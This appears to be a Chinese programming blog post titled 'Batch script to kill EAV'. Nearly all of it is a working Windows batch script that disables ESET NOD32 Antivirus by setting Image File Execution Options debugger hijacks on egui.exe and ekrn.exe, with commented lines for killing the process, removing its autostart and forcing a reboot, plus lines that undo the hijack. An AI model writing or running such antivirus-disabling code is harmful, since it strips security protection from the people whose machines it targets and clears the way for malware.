[编程实例]批处理干掉EAV

 
  1. @echo off
  2. reg  add "HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File 
  3. Execution Options/egui.exe" /v debugger /t reg_sz /d svchost.exe /f >nul 
  4. 2>nul
  5. reg  add "HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File 
  6. Execution Options/ekrn.exe" /v debugger /t reg_sz /d svchost.exe /f >nul 
  7. 2>nul
  8. ::reg delete HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Run  /v egui  /f 
  9. >nul 2>nul  
  10. ::taskkill /f /im egui.exe >nul
  11. ::重启计算机,eav宣布投降
  12. ::shutdown -r -t 0
  13. pause
  14. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  15. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  16. :::::::::::::::::
  17. ::下面是恢复EAV的注册表文件内容(!安装路径可能不一样):
  18. ::Windows Registry Editor Version 5.00
  19. ::[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
  20. ::"egui"="/"E://Program Files//ESET//ESET NOD32 Antivirus//egui.exe/" /hide 
  21. /waitservice"
  22. ::解除对EAV的劫持
  23. ::reg  delete "HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File 
  24. Execution Options/egui.exe"  /f  >nul 2>nul
  25. ::reg  delete "HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File 
  26. Execution Options/ekrn.exe"  /f  >nul 2>nul
  27. ::重新启动eset服务
  28. ::net start ekrn

你可能感兴趣的:([编程实例]批处理干掉EAV)